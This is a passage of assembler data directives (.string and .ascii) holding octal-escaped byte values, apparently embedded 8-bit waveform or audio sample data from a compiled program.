"\343\351\355\357\363\371\375\002" .string "\007\n\r\022\026\026\027\033\035\033\033\034\033\030\027\024\022\021\016\013\t\t\006\003\002\002\001\377\377\377\377\377" .string "\377\377" .string "" .string "\377\377" .string "\377\375\374\374\372\370\367\365\364\363\361\356\355\357\355\352\352\354\352\353\354\360\361\366\366\371\372" .string "\377" .string "\002\006\375\356\363\366\r\325\311\370\036\003$f\025\362\375#\002\372\366\0236\364+\001\315 \024\375\024(:\t\360.\357\273\340\347\026<\372\366\033\365\337\253\253\314\362\037!\006\026\b\375\376\345\362\346\341\305\316\305\274\313\255\305\324\313\301\311\361\354\347\365\323\312\320\256\302\270\302\314\321\364\321\356\365\341\336\326\342\n\346\340\007\365\017\007$\"5B\027+*>L;><\030.+\365\006\035\035\r$\030$<\020\021\r'TXML-A$\030#\005\036\001\336\352\370\334\356\344\343\t'\013\374\b\006\007\370\344\351\371\334\331\327\327\336\001\321\342\363\351\013\007" .string "\017\016\374\371\355\004\365\r\363\330\364\032(?2\037H>.16\"/\035\375\024$&\034\355\375\034\023\017\036\023\003\023\370\b7&0;\03399(\017\353\f\376\377\007\373\024(\033\n)/RQ+\024)'" .string "\363\320\320\304\307\330\327\320\373\357\317\340\355\352\346\335\272\333\315\303\271\246\261\265\301\305\312\330\352\337\352\333\344\006\366\341\347\363\354\337\336\316\313\360\361\361\002\035(-\031\021\037--\016\0312(\020\n\357\366\001\362\356\377\017\024\017\017%,ST=N?76\013\n!" .string "\364\352\352\357\362\344\326\343\367\020" .string "\367\370\377\361\351\340\310\357\377\335\340\356\360" .string "\371\344\375" .string "\002\372\355\370\346\356\344\323\340\361\351\354\335\337\f\001\377\374\024 &3\026\033\031\032\003\367\r\"\037\t\025&5J6/@?TUMQVP>\031.:#)\r\036(#+\"/,:!\032/\033\372\343\332\326\335\330\346\346\357\001\r\373\002 \004\007\b\363\004\377\356\352\334\363\013\007\002\t$!\030\031\001\024\026\372\343\340\350\332\317\305\262\276\327\310\302\274\312\320\314\346\346\346\360\354\340\330\346\351\333\325\301\326\350\324\331\330\337\365\352\355\006\017\030\005\366\374\005\027\005\357\370\003\003\370\003\002\b\032\037**17\026\375" .string "\376\376\367\355\346\374\005\357\004\032\037D1+EBD#\022\022\371\375\360\313\323\326\337\335\334\357\006\013\372\376\016\036\032\017\367\367\371\372\354\335\363\370\347\341\356\354\362\003\367\360\033\020\025\t\355\373" .string "\371\352\342\345\361\353\352\332\357\016\005\005\021\017! \n\373\023\027\006\007\375\026\r\001" .string "\001\0271D<FSPZ='6$\f\013\377\002\007\372\002\003\023'\037\035\036\034\037\007\367\371" .string "\377\375\371\356\001\022" .string "\374\003\027+&0./72'&8>/,\025\030&\377\002\003\t\031\t\001\374\001\b\362\345\350\340\343\322\276\273\300\274\264\271\304\305\341\335\316\331\327\347\322\311\323\333\320\307\273\256\303\305\267\275\302\316\351\326\325\340\351\351\332\325\340\341\336\322\277\325\320\326\346\320\326\355\354\343\345\366\363\363\365\365\001\n\024\004\364\003\024\022\376\003\017\017\035\020\007\032\024\023\020\005\031 \036\f\002\025\031\034\032\031+5239DGO:/A<)\030\024\017\025\021\024\022\0334)&)896&\027,#\021\007\373\375\003" .string "\376\370\n\026\020\f\f\030\037\020\006\t\b\005\376\370\351\367\013\005\001\004\r\021\371\001\377\374\001\361\354\331\352\341\322\320\300\315\315\264\272\270\266\306\267\270\304\324\353\346\352\354\353\367\350\344\360\373\372\372\377\b\023\"&!3@N<-72\036\023\t\004\t\b\370" .ascii "\005\005\036\004\005\027\024\032\024\n\020\013\b\372\355\374" .ascii "\366\363\361\354\361\373\t\376\376\023\027\025\023\r\t\007\375" .ascii "\364\353\366\373\370\355\360\367\371\007\367\372\004\376\013" .ascii "\006\357\374\367\356\343\320\330\324\323\311\305\327\343\343" .ascii "\351\371\372\007\r\001\374\375\363\343\333\317\326\331\317\313" .ascii "\303\305\324\333\331\340\360\356\367\361\354\374\357\354\356" .ascii "\353\357\367\356\355\366\376\006\006\f\013\020\031\016\003\007" .ascii "\013\377\376\376\360\373\374\373\370\364\376\006\007\020\026" .ascii "\036#\035\027\024\035\023\023\016\004\t\020\n\013\017\017\035" .ascii "$$(/74335</# %\037\023\023\020\022\031\031\030" .string "\037%%\027\017\f\005\365\346\342\326\332\340\325\347\363\355\b\n\r# '$!&$% \036!!).,.3:/16,(\034\021\013\006\375\367\355\353\351\347\344\344\354\354\370\353\355\373\357\360\361\345\341\333\327\333\317\316\320\316\315\317\327\331\331\331\334\330\335\341\331\326\333\330\322\322\317\317\305\310\307\305\315\325\335\332\333\335\324\334\330\313\323\314\307\310\302\310\314\304\317\325\337\346\343\352\350\351\360\351\345\347\344\335\337\337\330\333\340\336\344\356\372\005\005\017\016\027\032\032\034\027 \025\020\027\016\024\034\020\036\036\037,&-201-,+*) \032 \"\037\034 *&,00//.*/./*)%#)*'+/2?<=:580+' \027\n\005\b\002\003\005\001\001\007\001\371\367\361\352\343\341\341\337\337\346\342\341\343\351\354\356\370\373\376\007\t\013\023\021\031\037\031\" \035\036\025\022\023\022\n\007\007\004" .ascii "\374\367\370\366\367\362\351\352\350\336\326\324\323\320\316" .ascii "\321\316\322\324\326\324\330\337\326\334\336\327\332\327\324" .ascii "\327\314\317\322\315\324\325\324\325\323\326\325\330\337\332" .ascii "\326\330\332\325\325\326\320\321\327\330\327\335\341\336\334" .ascii "\334\334\341\343\343\345\340\345\343\341\346\337\344\350\336" .ascii "\346\347\344\347\342\345\355\362\363\367\371\367\371\377\002" .ascii "\006\t\020\025\023\033\031\031 \036!!&+)+)*%'&!)'\"('+.).201" .ascii "40/-+'(&#$\"\037\036#&\"!,(,0.-+-*+,0,%)&%&\035\036\034\024\027" .ascii "\022\b\t\004\374\374\363\361\352\347\340\327\333\331\330\331" .ascii "\341\342\347\354\355\357\365\366\366\370\373\001\376\005\b\t" .ascii "\013\017\030\032\033 \037\035\034\026\026\017\t\b\374\377\377" .ascii "\366\364\362\361\356\361\362\353\356\353\345\342\342\342\332" .ascii "\331\330\324\324\324\325\323\316\322\322\325\334\336\340\337" .ascii "\341\341\334\337\335\331\336\326\326\331\323\327\324\323\327" .ascii "\330\330\333\335\336\334\337\336\333\336\335\333\330\330\326" .ascii "\323" .string "\327\326\325\333\337\341\345\347\350\345\346\344\343\343\340\340\331\331\334\330\341\340\343\354\356\364\376\002\006\r\013\017\022\025\024\026\027\023\022\026\032\035$')+,.))('%& \033\035\031\033\031\031\027\021\001\016\033\365\036\3668#\361\t\370\n\310%T4\032\337\364\026\347\334\357\342\346\315\351\363\324%\001\356\367\321\027\035\310\rJ\"9\035\356\310\310\317\343\310\243\304\337\274\275\341\364\344\335\334\352\347\0063*\377\027T6;(+$\373\341\362\337\361\326\363\314\222\255\255\271\237\262\326\331\265\323\354\017\026&.A>RA+\0270L+.\f\022\n\370\350\372\016\036\035\036\360\365\f\362\333\330\b\034\334\340\355\333\344\326\325\302\310\357\365\306\327\321\001\027\"\026\030=;DCRG2A6\0072G(\354\377\024\r\007\347\363\374\367\r\001\346\346\373\005\367\372\022\024\002\372\007:<(\033\032\b\t\032\371\350\371\374\365\351\r\372" .string "\031\020\036-7\021\364\345\343\345\t\005\362\334\343\365\360\330\360\343\335\326\261\341\345\366\376\333\345\025&:1\035#0\"$\017\n\367\033\r\013\033\365!\022" .ascii "\377@3\t\375\016\023&\f\020\020\370\373\322\336\323\342\333\273" .ascii "\241\241\300\322\260\263\262\275\303\326\346\322\332\357\005" .ascii "\002\034 G\033\017\"\031:\022\027\007" .string "\022\024\n\027\342\326\330\346\331\315\333\354\345\323\337\372\t\f\030\013\006\025\032\361\350\343\342\336\307\321\315\331\337\323\362\377\013\034\026\035\374\0257@0\0136?,%\025-\003" .string "\033\016\031\027\034\n\375\007&&\034\002\016\036%'\022\021" .string "\365\t\372\342\365\330\321\320\333\354\357\334\330\345\373\006\031\036\030\035-V@KTeeGVgO0)\023\007\013\006\374\333\323\340\361\345\341\345\356\342\327\347\306\334\277\301\312\333\337\333\371\322\321\350\002\366\352\364\357\374\004\r\035\030\035(2+?\\S!63-0\017\022\b\002" .string "\005\357\353\345\361\357\344\357\370\366\357\346\364\366\364\366\356\330\325\336\333\317\303\302\270\310\253\310\312\301\303\272\323\335\356\366\371\361\374\013.!\027/\033\037\032)&\t\017\032\032\003\r\003\351\323\305\327\345\337\330\327\353\353\367\377\f\f\376\026\b\003\370\366\363\335\307\317\324\336\307\305\332\326\361\374" .string "\373\005\r\030\026\"%/\035\021#2$\031\r\006\025\0352\006\016\032((%+47 %6:4(\027\016\b\031\030\375\342\344\345\342\340\336\321\337\330\345\356\346\003\376\375\004\025!9:0<FL?>3\034\036\026\026\003\365\374\360\345\362\r\022\377\363\363\021\r\364\377\347\336\344\366\373\373\364\374\366\350\341\364\003\360\347\347\357\377\367\376\020\357\003\020\"\027\026\030\376\361\370\004\374\365\341\335\342\353\364\370\350\347\364\005\f\f\b\032\"\021\031%#(\024\021\017\370\006" .ascii "\356\333\342\351\350\333\317\320\317\317\326\337\340\342\345" .ascii "\341\343\363\003\370\351\345\330\355\360\346\326\320\332\303" .ascii "\324\337\304\272\276\275\274\300\314\327\316\323\347\002\021" .ascii "\032\032\025\022\027#(\022\f\024\366\366\372\f" .string "\f\373\367\001\r!\037\027&\016!>4# \036\034\024\r\017\007\371\360\361\350\362\366\365\366\337\362\001\017\b\375\031\031 \031\022\t\r\f\t\030\025\020\t\370\352\366\004\n\377\372\371\005\016\033 \034&.>G<W]OWK\\J<'\035!\030\033\006\366\355\357\371\361\350\361\356\345\331\331\334\321\315\310\303\307\323\344\326\324\321\330\364\340\343\354\351\371\364\370\374\013\032\025\030\025'64#\030\030\030\f\006\001\371\362\363\364\371\365\356\372\357\371\t\023\022\030\026\034,\033('\035\n\t\376\361\366\345\360\335\316\327\332\327\307\301\307\320\322\332\330\326\326\337\355\355\342\344\353\351\344\345\357\354\352\344\335\306\325\323\303\305\253\306\317\303\316\321\340\337\353\375\002\r\n\f\007\f\013\021\016\366\362\374\001\004\002\r\022\b\027\035$\031$+& *;& \026&- \027\023\017\007\007\b\007\001\006\f\b\004\020\027\030\017\r\025 \027\034\030\013\024" .string "\020\003\351" .string "\365\362\360\347\363\357\361\345\355\377\f\017\007\030\027)876@D?;;8.'\034\030\016\025\017\005\002\372\002\006\007\366\376\375\355\355\346\363\345\343\332\352\354\357\b\363\364\362\007\t\001" .string "\005\b\r\017\024\024\023\033\034 \025\030\031\026" .string "\367\375\366\342\341\323\325\314\324\340\321\323\325\336\334\341\337\365\373\355\367\005\377\003\373\367\371\363\371\366\356\345\351\353\347\340\340\351\355\341\343\361\363\370" .string "\004\375\377\027\f\017\016\n\036\032\r\r\t\002\007\363\360\353\347\342\336\332\324\333\334\332\325\335\345\346\350\351\352\351\351\352\345\342\342\342\336\322\321\337\343\346\336\342\356\356\366\372\003" .ascii "\t\r\004\b\007\n\n\377\371\007\006\373\377\003\004\n\023\025" .ascii "\023\020\033&'%*4532=<>>5.17-\037\026\031 \030\006\t\f\027\025" .ascii "\r\034\027\031$" .string "$-+5?78663\"\037\027\n\007\001\372\355\352\353\344\331\325\333\334\312\304\305\277\300\277\272\273\275\306\323\327\327\330\346\354\350\360\001\t\r\f\n\024\026\027\034 \037\"(*\027\031 \026\021\b\f\t\002\376\375\373\373\377\001\374\370\005\r\017\013\t\016\031\r\r\026\024\r\007\002\377\370\366\374\345\353\347\350\343\337\347\352\351\333\343\342\345\356\366\364\357\356\371\371\363\361\364\370\364\355\353\353\344\341\337\332\321\320\316\316\305\301\321\333\314\314\323\337\335\335\337\331\350\337\345\333\333\343\350\354\335\345\353\373\373\367\b\016\016\017\021\021\017\035$\035\027\025\035\034\027\025\031\032\030\030\033\031\036#'*\",75206?3336610\" &%\030\r\r\016\007\001\377\f\020\r\022\013\020\025 #\035\"%)%\034 \030\020\n\005\377\372\365\363\344\341\346\340\325\320\314\321\304\267\275\274\303\302\303\313\315\327\335\337\346\353\374\370\376" .string "\002\n\022\023\027 \033))\"\036%$\032\024\024\023\020\005\001\003" .string "" .string "\376\377\375\375\005\t\002\003\n\020\024\b\016\025\017\r\t\020\005\006" .string "\001\370\356\363\363\355\336\346\344\351\341\337\354\364\351\353\356\355\366\365\374\372\375\377\004\376\365\370\375\376\360\360\356\350\345\342\333\321\321\325\325\314\312\320\326\321\323\325\331\331\327\337\333\330\340\342\342\336\342\352\351\350\353\370\372\376\004\376\003\t\002\r\016" .string "\b\024\022\006\003\013\017\013\n\021\021\022\025\031\030\033\037\"\037\034%.*'%,21G1;3\016 \026\007'\027\354\365\t\f\361\343\347\372\f\0367;/CB.O;2D\021#\025\374\035\367\016\031\353\033*\021\377\003\f\354\345\332\305\306\313\273\245\253\316\305\312\340\337\002\032\034\372\373\030\n\007\004\021\026\t\376\371\357\021\017\017\030\351\036+\026\021\004\f\024\004\350\336\354\343\322\320\277\343\360\374\364\363\030\025\007\375\013\n\006\005" .string "\356\364\365\336\310\306\334\346\354\316\324\372\373\360\363\362\004\007\361\363\374\364\366\364\336\345\376\026\013\b\r\016\031\r\r\030\024\016\003\364\372\362\342\330\307\307\322\351\331\324\361\375\007\377\005\007\021\t\363\366\371\365\364\356\344\373\372\007\006\004\035\036(\025\030--&\023\f\003\377\374\363\344\355\006\004\374\005\036#%\036'*'%\023\027\017\007\016\367\355\005\b\007\375\377\021\031\n\004\b\027\026\006\376\357\372\371\362\337\343\375\020\n\006\030'4*!%=5\032\t\003\001\004\365\333\342\360\350\344\335\330\365\364\342\336\345\355\361\351\326\330\344\351\344\331\335\363\002\003\366\n(3*'6@E8+ \")\023\375\006\032\027\003\376\t$%\024\025\033\034%\023\377" .string "\001\f\370\352\347\370\003\364\355\374\016\021\016\004\003\f\f\370\336\333\343\330\316\301\307\334\340\322\326\340\364\375\370\372\372\006\013\376\362\362\356\365\341\322\333\350\346\335\333\346\363\363\354\350\353\351\345\322\313\311\311\307\275\270\302\315\315\311\320\350\360\366\364\375\007\t\017\005" .ascii "\001\004\002\364\354\374\002\375" .string "\373\376\020\033\035\025\034 \032\n\005\006\022\007\370\371\013\025\r\r\027.43/4B>6$\033 \036\013\370\365\006\004\372\373\001\025\035\031\027\035&-\"\024\021\"$\024\b\013\036\037\030\025\03614)#\"('\024\371\362\370\362\331\304\307\323\323\311\305\320\347\360\352\356\363\375\f\376\357\361\001\004\364\353\366\t\021\f\013\032,4.''/2 \006\004\n\005\355\340\345\360\361\352\353\366\007\r\n\005\b\022\025\001\362\361\366\361\337\323\333\344\343\335\334\347\357\366\357\351\354\364\362\345\330\331\335\332\314\305\320\333\336\331\343\367\001\005\b\004\t\016\f\373\362\356\357\344\317\313\325\334\323\317\322\340\350\352\344\347\362\362\360\343\331\340\343\330\314\317\340\350\347\352\365\013\027\032\034\036*,%\026\021\030\030\007\371\376\r\016\b\007\021#)&$)39-\035\034&#\023\005\013\033\034\025\024 082))34!\f\t\022\013\365\351\356" .ascii "\001\375\372" .string "\b\034\"%!%68'\027\026$\033\007\371\374\t\b\373\371\001\n\017\005\375\370\377\375\346\324\315\325\314\270\262\267\312\312\313\321\337\364" .string "\002" .string "\t\032 \023\n\f\026\021\002\374\003\f\r\b\t\021\033\037\031\023\023\032\025\002\364\365\370\357\340\335\345\355\355\354\362\374\b\r\t\007\r\022\f\374\362\361\360\343\322\315\327\330\324\323\331\346\355\356\353\356\366\375\367\352\346\355\357\344\331\337\355\362\354\353\367\003\013\n\005\007\f\r\001\356\345\352\347\320\302\305\317\321\311\310\324\345\355\354\352\357\374\004\371\354\355\373\373\356\345\360" .string "\006\001\002\020 *&#&15'\026\025\034\031\b\374\001\r\017\013\013\025%.,(,7;-\036\034% \017\005\n\022\023\016\f\022\033\"\036\031\031!#\026\007\006\n\007\374\365\372\002\b\007\n\023\037&&%$)+\034\017\f\r\005\363\355\357\355\353\344\340\345\350\354\345\343\341\344\343\330\323\327\330\324\320\320\334\341\346\355\367\005\017\027\035\037$*' \033\034\031\017\005\003\007\004\377\376\002\007\b\t\b\b\n\r\007\376\372\375\373\361\350\354\362\362\357\360\367\376\003\002" .string "\377\003\003\372\355\351\352\346\330\317\322\331\330\325\330\337\351\356\361\363\365\377\005\376\370\366\374\374\362\352\354\363\360\354\354\357\365\371\364\357\357\360\360\350\331\325\330\326\311\304\306\320\321\320\326\333\351\360\370\371\374\006\r\013\005\007\020\r\b\004\007\013\r\016\020\024\030 ! \034\"#\036\022\021\024\022\f\b\n\016\020\023\026\032 %+((+,%\035\031\030\021\n\006\006\004\002\004\007\b\n\017\022\022\022\025\026\022\017\020\020\f\b\013\r\r\r\020\026\027\031\033\034\031\026\025\020\b" .string "\373\364\350\340\336\333\326\322\322\325\330\333\336\342\345\353\361\361\357\361\372\374\370\372" .string "\t\f\r\023\032\037%(()),$\033\030\027\023\006" .string "\001\002\377\375\376\002\004\b\n\b\t\013\017\n\002" .string "\004" .string "\367\364\365\367\365\363\362\363\367\372\371\365\364\366\370\362\351\351\353\350\340\335\340\344\346\350\353\357\364\374\001\376\376\004\007\002\372\370\371\364\356\347\346\344\342\341\340\335\336\342\342\336\332\335\337\333\324\324\326\325\322\324\327\333\340\350\355\363\371\004\013\f\017\024\030\025\022\022\021\016\f\f\013\b\t\f\016\f\r\022\024\023\023\024\026\022\017\021\016\f\n\r\r\013\r\021\024\024\025\030\032\030\027\026\023\r\n\t\002\374\372\372\372\367\370\374\001\001\004\007\013\016\021\024\021\016\021\024\017\t\b\013\t\006\003\005\004\004\002" .string "\374\367\367\363\352\342\340\336\327\316\316\320\321\321\324\331\336\344\356\364\367\376\007\r\r\r\023\031\030\026\027\032\034\034\035\035\034\037\"!\034\032\035\034\024\016\r\r\t\004\002\002\002\003\005\004\005\t\016\016\013\013\017\017\n\004\003\002\376\372\367\364\362\363\364\362\357\364\370\370\365\366\372\373\367\366\367\367\367\370\370\366\370\373\001" .string "\377\002\b\b\004\002\003" .string "\374\367\363\357\350\346\343\335\333\335\336\333\331\334\341\341\341\344\347\350\351\355\356\357\361\365\372\372\375\004\n\016\017\024\031\033\034\036\036\033\034\034\032\023\020\022\020\f\013\f\017\020\017\021\024\025\026\031\027\024\025\030\025\021\016\017\020\r\n\f\f\f\r\f\n\b\n\013\b\003\002\003\002\374\372\373\374\374\374\377" .string "\002\b\013\013\n\016\023\017\n\t\013\b\002\375\373\366\363\360\355\347\345\345\342\335\330\331\332\327\322\322\324\324\324\326\330\333\340\347\354\357\366\001\b\n\r\024\032\032\031\033\034\032\031\027\025\021\021\021\017\n\t\f\r\t\007\b\t\007\005\003\002" .string "" .string "" .string "\375\373\374\001" .string "\375\375\001\003\001\376\377\376\373\372\367\363\360\360\357\352\347\351\354\353\351\353\360\363\363\364\365\366\364\366\364\362\361\365\370\367\364\370\373\374\372\374\375\376\375\371\b\001\360\001\357\335\b\360" .string "\n\325\373\0279*\362\r!\026\362\371\332\335\027\355\375\354\317\336\006$\025\366\002$\013\030\337\361 \006\025\003" .string "\351\366\373\360\372\341\333\365\003\376\315\273\326\330\325\342\371\325\344\336\353\t\002\361\355\007\376\376\326\343\r\017\024\377\007'\003\f\354\315\330\302\371\022\004\352\003!'@\"\020\033'\036\021\027\007\n\346\342\355\277\304\306\374\n\t\372\372$\t\t\352\t.0?5\"\025\003\0274\027\017\f\023\032\026\346\340\377\003\017\030\036\n\003\361\003\025\374\002\367\0255\037" .string "\005&\032+' J?A?%\021\006(2-\035\007\003'+\017/ ),\037\026\373\370\332\341\356\326\322\327\374\023\363\356\351\f\032!\023\370\373\344\373\006\003\373\366\n\036#\007\352\347\365\365\321\331\342\362\374\346\375\372\377\006%8\035\033\022&0\032\374\362\t\027\031\017\036#\022\030\027\004\367\337\352\006\005\346\311\314\324\343\305\301\311\330\337\314\337\322\313\320\321\353\340\322\330\372\f\361\352\344\370\n\021\024\033\031\017\t\365\363\350\322\350\005\n\357\323\325\317\320\263\260\300\313\332\322\343\333\335\364\013+) \037,4#\022\372\005\016\377\365\363\362\345\361\370" .string "\377\353\374\013\017\372\346\365" .string "\016\366\360\374" .string "\016\006\t\001\366\366\001\027\023\004\b /'\025\n\037.*0*-\034\033\036 \035\002\020\032#\025\372\001\013\016\001" .string "\005\b\024\020\022\013\372\377\020/;2+9B0\031\004\024\025\021\f\002\f\372\364\373\373\367\346\371\006\002\354\303\266\270\303\304\313\326\344\361\353\363\356\337\340\347\002\b\375\367\007\037\032\022\020/CMQCF.\"$\032\017\373" .string "\b\r\377\341\343\345\351\340\327\333\336\342\333\335\330\313\307\315\350\360\344\332\346\370\362\352\340\360\376\376\004\376\001\367\362\372\365\362\345\350\370\377\362\336\333\332\335\325\313\323\334\341\335\343\343\324\310\311\337\337\325\322\334\361\362\363\364\n\".>:8, \"\030\020\372\361\371\364\343\310\304\315\333\334\335\356\363\365\360\365\371\362\365" .string "\034#\034\027\032+)$\035&34:30(\035$$!\022\r\033\"\027\373\365\374\006\001\377\b\007\n\004\007\013\003\004\f$-&$#0/*&,<CMMNB/0.&\017\001\006\b\370\335\325\331\343\343\342\354\355\356\351\345\334\307\277\302\327\345\350\353\357\002\b\006\005\016\034\035\036\034\034\020\005\017\030 \030\031*5.\025\f\b\f\n\003\004\375\371\365\363\363\351\351\356\376\005\374\362\357\373\373\364\361\366\001" .string "\376\372\367\353\335\342\352\357\344\335\345\351\342\323\316\320\331\337\340\344\340\340\337\340\346\341\337\342\361\373\364\352\352\367\374\370\362\367\377\370\362\354\346\335\323\335\350\360\356\360\375\004\005\373\365\366\372\374\367\366\354\343\334\330\336\332\331\340\366\t\007\377" .string "\016\024\023\024\036**+(#\033\022\030\035 \031\022\025\025\022\006\001\005\f\021\017\021\017\013\005\005\016\f\t\f\034)#\030\024\034\"!\"&-+-*$\034\024\031 \"\034\026\032\037!\031\023\030\033\033\022\r\b\376\363\356\365\363\356\357\374\b\005\374\367\375\376\371\361\351\345\336\337\342\341\341\336\351\365\374\371\360\363\370\372\360\352\362\374\003\002\n\021\023\025\033&%\037\034\"(\037\024\r\017\020\016\r\n\n\004" .string "\375\366\356\343\343\352\354\344\325\322\327\327\314\304\311\321\326\324\330\332\327\327\333\347\350\346\351\363\375\371\363\361\365\373\373\374\372\373\365\360\356\353\350\336\335\346\353\344\323\317\321\322\310\300\305\314\323\325\336\343\345\352\365\003\005\001\003\t\017\b\376\365\367\372\367\365\363\370\370\367\371\374\376\366\366" .ascii "\b\006\372\373\002\007\002\377\005\b\r\017\024\024\017\021\026" .ascii "\"#\037\037%/,$\035!('$ # \033\031\030\026\013\b\017\023\016" .ascii "\002\002\006\n\007\005\n\f\020\022\027\032\027\031" .string "!/4/,-3/#\026\024\030\024\r\006\006\001\373\372\371\365\351\344\350\344\330\305\300\302\304\303\307\321\330\341\347\361\367\367\371\377\013\023\021\017\023!'%\"(4750.&\035\033\026\017\001\373\001\001\371\353\350\354\354\350\343\345\346\351\347\350\352\346\345\343\353\361\354\347\347\362\365\361\353\356\366\367\367\366\366\361\354\360\362\357\344\340\350\354\350\333\330\333\337\337\333\334\340\345\345\346\350\345\343\341\347\354\350\344\345\360\365\363\362\371\003\005\006\b\b\001\371\373\372\365\351\341\345\351\347\335\333\341\352\360\360\364\370\377\003\007\r\r\017\021\034%!\036\037+/)&)0-,,+&\036\037 \035\024\f\017\022\022\t\004\006\013\017\013\013\f\017\020\022\027\026\024\025 )$\037 +0+'+33220*!\037\034\026\013" .string "\377\377\375\363\354\354\357\361\355\354\353\351\346\342\344\335\324\322\334\347\346\344\350\367\001\001" .string "\004\f\016\020\021\020\017\f\021\025\027\025\022\030\035\036\026\017\017\021\020\n\b\007\005\002\001\007\005\376\373\001\n\004\374\371" .ascii "\003\376\371\366\366\364\362\360\353\345\337\341\344\343\335" .ascii "\327\332\340\343\334\330\334\343\346\343\344\350\352\351\352" .ascii "\363\362\355" .string "\354\362\373\371\364\362\370\373\371\365\361\360\354\352\350\343\337\330\332\337\341\336\330\335\346\354\346\340\344\352\355\347\347\351\351\350\352\362\364\362\364\375\t\t\007\b\020\025\025\024\023\026\026\026\030\027\026\020\020\025\031\026\f\016\025\032\025\016\017\025\030\024\024\025\024\023\025\035\033\026\025\033#\037\031\027\033\037\034\031\026\030\030\026\026\025\025\017\016\022\027\026\r\017\026\034\030\021\021\024\024\017\r\f\006\003\003\b\005\376\372\376\005\001\371\362\363\363\355\345\334\333\331\326\327\327\332\331\333\343\352\354\347\352\363\373\372\370\375\004\t\f\022\030\030\032\036'( \034\035$!\030\021\020\023\021\013\004\003\001\375\373\367\365\355\351\354\355\351\336\334\341\343\335\330\332\335\336\336\341\345\343\344\346\357\362\356\355\357\370\372\367\362\362\370\370\366\360\360\357\355\355\354\354\344\341\347\352\345\332\330\335\337\332\323\325\330\333\333\336\343\343\346\351\361\365\362\360\362\370\372\366\361\360\366\367\365\364\366\370\366\373\376" .string "\372\371" .string "\007\005\376\377\013\020\022\016\024\026\034\035\037!\035\035\034\"\037\035\026\033\033!\023\027\004\013\374\371\033\360\344\335\362\022\362/G\377\034\352\340\335\350\013\003!)\347\333;!\004-<@\374\r\025\263\313\272\340C\002\357\021\f\036\327\334\334\342\021$$\002\025\361\364\334\320\310\340\325\273\316\266\306\311\304\313\344\333\343\362\327\343\f\347\300\317\267\277\276\260\330\312\337\371\343\342\341\347\337\305\311\352\335\361\365\336\352\007\024\n-=821JZT^>%H\022\371\001\006\026\023)\0316=!*\026-OP^.\0350\027'\004\351\r\005\362\350\335\352\375\366\373\0201'\035\377\366\024\367\356\326\324\344\374\342\334\357\345\367\364\354\361\032\034!\370\336\377\352\360\334\326\353\330\360\356" .string ";E>0?ID7\033\030\034\024\004\r\004 \022\377\031\0218,;\024\007+\017 \016" .string "))\032\033\377\b\372\003\003\334\003\023\013 \021*@\033#:U4%)\002\013\372\340\333\322\341\375\344\347\001\363\364\360\344\276\325\317\275\271\236\275\260\232\246\270\307\323\307\336\353\351\370\344\342\376\355\346\346\307\342\360\345\315\347\367\001\030\035(\032\"\"\006\365\021\026\b\016\032\t\r\004\340\354\357\377$\016\0200*.#*MUQ<&9+ !\n\021\025\032" .string "\360\361\347\355\343\353\370\372\362\344\321\327\352\331\324\345\353\370\001\354\373\032\004\365\356\353\r\005\365\341\330\371\345\345\356\333\367\001\366\376\b\013\376\021\022" .string "$\025\006\375\353\362\376\372\371\002\r*(#6M@D45ZSJOBJA25(I;-%\037%4\"\016\036\036\022\t\016\354\360\343\320\324\326\354\377\374\001\035#\033\034\003\004\"\372\363\363\341\361\364\353\354\003\025\030\034!\035&%\006\371\365\337\342\331\314\304\315\310\264\315\323\330\321\310\324\337\360\370\331\323\347\354\327\325\320\304\327\331\310\321\341\351\364\335\353\367\373\376\370\003\003\365\362\343\355\376\361\360\366\373\367\b\006\367" .string "$.4-$*\037\n\361\351\354\375\367\352\007\017\0243\037(HDC4-5\033\007\363\341\347\330\327\324\311\351\370\355\372\f\034\027 \017\003\031\025" .string "\347\346\377\373\355\364\360\371\002\b\357\371\r\377\005\373\367\005\350\331\340\330\361\352\341\332\331\366" .string "\377\b\013\033*\026\007\020 \017\007\363\373\020\020\016\b\021\031%\022\"?H@CC5D'\017\f\003\020\017\366\362\375\f\023\b\025(:;\"\031\f\372\374\364\346\353\002" .string "\377\f\021\025\031\032 4<5\034\"..\035\016\022\0341'\023\033\033\025\"\017\017!\034\031\r\006\377\370\365\341\331\334\326\312\300\307\316\325\326\307\321\346\350\340\320\306\312\313\272\265\270\275\303\271\252\270\305\311\317\306\333\371\346\347\350\333\345\341\341\323\315\320\312\312\313\315\344\363\350\335\345\364\364\356\327\327\351\354\337\331\354\001" .string "\365\373\377\016!\030\016$/\"\030\021\n\022\016\006\r\004\021\r\005\016\020%)-,7GM>'5=2!\033\035!\036\f\003\02111)05>=:1,6 \022\031\005\031\016\363\001\004\034\031\020\021\025($\013\r\020\017\017\372\346\351\376\367\353\366\377\021\027\020\023\023\024\n\373\364\365\370\345\322\322\312\330\322\307\325\317\327\333\316\303\306\311\315\310\314\324\332\340\310\310\335\337\336\350\351\362\001\016\016\022%'-&<G;5#\034\031\037\016\006\022\n\f\031\002\f\035\024\031\b\002\t\b\375\366\352\357\356\363\356\345\372\376\374\370\t\013\r\024\r\025\033\027\t\372\374\002\370\364\366\371\374\007\006\374\b\r\001\377\372\364\373\367\356\352\334\332\326\313\323\320\326\331\326\336\343\364\376\373\373" .string "\r" .string "\362\355\352\355\341\341\326\330\344\336\322\330\341\334\341\345\345\344\350\344\345\351\330\336\344\331\346\352\374\002\374\005\t\031\025\n\016\017\021\f\377\373\372\003\003\375\376\001\005\n\t\006\r\f\022\024\017\013\013\007\004\004\370\003\375\367\f\t\017\027\020\031&)0).74:0,33+'\036\032\" \f\024\032\027\033\026\034\025\006" .string "\367\356\353\344\334\316\327\335\342\366\363" .string "\025\023\037\037\032(\" \036\030!#$(#289=ED65.%\037\024\t\375\373\376\362\361\350\352\355\356\357\352\367\371\364" .ascii "\365\351\364\343\336\333\322\330\330\326\327\325\335\331\333" .ascii "\341\342\345\341\337\333\337\334\320\311\305\307\314\304\304" .ascii "\300" .string "\276\310\310\314\320\332\336\332\343\333\326\332\317\323\312\302\310\311\310\316\320\327\341\335\351\361\362\352\343\344\344\342\334\327\320\314\326\323\307\324\331\337\343\356\375\004\013\020\024\021\025\027\023\032\034\021\025\025\021\035\035\033-!'4/3'),,'\031\032\031\026\025\020\023\025 